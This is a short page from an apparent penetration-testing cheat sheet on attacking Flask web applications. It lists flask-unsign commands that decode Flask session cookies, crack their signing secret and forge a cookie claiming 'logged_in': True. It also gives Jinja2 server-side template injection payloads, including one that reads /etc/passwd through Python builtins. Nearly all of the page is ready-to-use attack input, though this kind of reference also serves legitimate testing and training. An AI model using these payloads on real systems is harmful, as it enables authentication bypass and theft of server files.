Pentest Book
Search…
Flask
1
# https://github.com/Paradoxis/Flask-Unsign
2
3
pip3 install flask-unsign
4
flask-unsign
5
flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'
6
flask-unsign --decode --server 'https://www.example.com/login'
7
flask-unsign --unsign --cookie < cookie.txt
8
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'
9
10
# Python Flask SSTI Payloads and tricks
11
12
* {{url_for.globals}}
13
* {{request.environ}}
14
* {{config}}
15
* {{url_for.__globals__.__builtins__.open('/etc/passwd').read()}}
16
* {{self}}
17
* request|attr('class') == request.class == request[\x5f\x5fclass\x5f\x5f]
Copied!
Last modified 1yr ago
Export as PDF
Copy link